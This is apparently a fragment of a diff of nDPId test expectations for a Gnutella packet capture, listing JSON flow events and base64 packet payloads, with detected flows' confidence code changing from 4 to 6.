+00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":803,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90072,"flow_last_seen":90072,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90072,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90073,"flow_last_seen":90073,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90073,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":1,"flow_last_seen":90073,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90073,"pkt":"UlQAEjUCCAAn5uVZCABFAABtDzkAAIARfk0KAAIPLoBya3AJGbIAWQrBwagxArEYlVcnjAyV6XOvHEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90073,"flow_last_seen":90073,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90073,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":804,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90073,"flow_last_seen":90073,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90073,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01407{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":253,"flow_packet_id":2,"flow_last_seen":90132,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90132,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0EAAEARqALBJf+CCgACD\/CwcAkC35hMrf0xAupVi8ylWZxhuwdOwkQAAMACAAAGR1RLRwAAC5wNVaWmIUX476YAPO2IwX6VsyAEwSX\/gvCwAQAAAASWmcaYFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 
01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_packet_id":2,"flow_last_seen":90137,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90137,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0IAAEARx74ugHJrCgACDxmycAkC32FSwagxArEYlVcnjAyV6XOvHEQAAMACAAAGR1RLRwAAGIXhRHN5ftV2L3caNPMmmEQDSzUELoByaxmyAQAAAARlWXO2FEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqg=="} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_packet_id":1,"flow_last_seen":90138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90138,"pkt":"UlQAEjUCCAAn5uVZCABFAABtxUwAAIAR+3EKAAIPPPEwwnAJUzUAWWdCqc0xAhWpgpzJQk2EqzRt70QAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":811,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":1,"flow_last_seen":90138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90138,"pkt":"UlQAEjUCCAAn5uVZCABFAABtRC0AAIARXOYKAAIPWUs0E3AJs7oAWZEdEsYxApinpNiOVYwKMx8qLUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":812,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.75.52.19","src_port":28681,"dst_port":46010,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_packet_id":1,"flow_last_seen":90138,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90138,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTM8AAIAR3pQKAAIPUtmwNHAJHRYAWfrhGukxApDm6ECPcKUTk+0ioUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} 
-00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":813,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90138,"flow_last_seen":90138,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90138,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.217.176.52","src_port":28681,"dst_port":7446,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
01406{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":262,"flow_packet_id":2,"flow_last_seen":90182,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90182,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0MAAEAR20pZSzQTCgACD7O6cAkC35hjEsYxApinpNiOVYwKMx8qLUQAAMACAAAGR1RLRwAAGcOxs9Yotu5YI3ngDJa2NEz7hxIEWUs0E7O6AQAAAAQphpmTFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNVdTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAABpaaFBDXGgpcSmxYhITGidbcBteBEuFZV3Mj0dUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAABZMZh8YJqCRZ8rsFWpJujOrF1VMBFHNWy2cyQ=="} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90183,"flow_last_seen":90183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":1,"flow_last_seen":90183,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90183,"pkt":"UlQAEjUCCAAn5uVZCABFAABtGYoAAIAR6JkKAAIPXwrNQ3AJLVMAWdsMrwExAn9FQ02TKgtsdnbe2UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90183,"flow_last_seen":90183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00751{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":816,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90183,"flow_last_seen":90183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90183,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":28681,"dst_port":11603,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 
{"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00559{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90184,"flow_last_seen":90184,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90184,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":1,"flow_last_seen":90184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":90184,"pkt":"UlQAEjUCCAAn5uVZCABFAABtTH0AAIARTyMKAAIPy9zG9HAJBKoAWeojZPExAoo7ciOaCRHkTxe8NEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAACidCo0G3v\/IJjwziXwskXn9hKth"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90184,"flow_last_seen":90184,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90184,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":90184,"flow_last_seen":90184,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":90184,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":90267,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90267,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0QAAEARAUO1VLIQCgACD+tmcAkC3zlLdMAxAjueygYrMQV+6lVI4UQAAMACAAAGR1RLRwAAKnLYr\/aGTLaMbt4HEbnkS5LKRh0EtVSyEOtmAQAAAAQDkoiwFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjVdTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAAAZMeTOG2LuCeHzpFv+0pfJ1qOd4BGfoa2Sp9EdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tBFLZsDQdFkdUS0cAAB9npzFZ8csWEevUVjGg\/Ev3bcglBF8KzUMtU0dUS0cAABEOG
4JNEDwVGDdOEVl98CTJsF5uBMvcxvQEqkdUS0cAAGqU5DC0wpx7Tt\/+AtuQJkODlGIrBC\/cuoxr+UdUS0cAAGSQPhJYYczqO9fA1uqwCWebPjcpBMEgftbozEdUS0cAAGfwY9tAxh1AXF0ZU2EOIfqDQ08tBHbwRccYzA=="} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_packet_id":2,"flow_last_seen":90386,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":90386,"pkt":"CAAn5uVZUlQAEjUCCABFAALzA0UAAEARlVpn6GtkCgACD6n0cAkC312iBkIxAi75axRUS7XsWs\/C60QAAMACAAAGR1RLRwAABkx5M4bYu4J4fOkW\/7Sl8nWo53gEZ+hrZKn0AQAAAASAlqYNFEdUS0cAACn0WLPxWtQpnmCbIRk+uW\/YiZplBGBBRMKKmUdUS0cAACpy2K\/2hky2jG7eBxG55EuSykYdBLVUshDrZkdUS0cAACwUV8A2ZtuYGpHmurFJ9ZjbPjd\/BEIe3bUu7FdTSFIAACfu4Bqdy+iW81L+1nr6boaqfinyBC1Yddoa\/UdUS0cAAD\/LrtDBHsrvB2sw44AqY2QCrQYQBDNEmdZmjUdUS0cAADcgJ3MxU+9gPezRvKa4p+wbOpp4BLnL2lzegldTSFIAAAl5O+8DCDmOkVzxf\/SPVwlYhBdwBEiMeCm6e0dUS0cAAAucDVWlpiFF+O+mADztiMF+lbMgBMEl\/4LwsEdUS0cAAAyXtfcHfbQ8qEf8F4epyaClpDRCBFh4Sddf8kdUS0cAAA1pNBGyU44u8atjdhBEZcvofBcyBFA93fZ3cUdUS0cAAAAs7ncgF1geHmh4DMpMbatHwhb+BGD2nH7EeUdUS0cAAABa1S31uxK2I4OJWHaC\/PKs7lhZBFK1+9qOEFdTSFIAAAPVZnOFlO42Ib8H+pWWlT4wyAL3BBga2F82QUdUS0cAABiF4URzeX7Vdi93GjTzJphEA0s1BC6AcmsZskdUS0cAABjf5v+Urk90V\/WPMxinQSIciE4\/BDzxMMJTNUdUS0cAABnDsbPWKLbuWCN54AyWtjRM+4cSBFlLNBOzuldTSFIAABreJpDCEhk5HaHmWa2KZ2KgQT+tB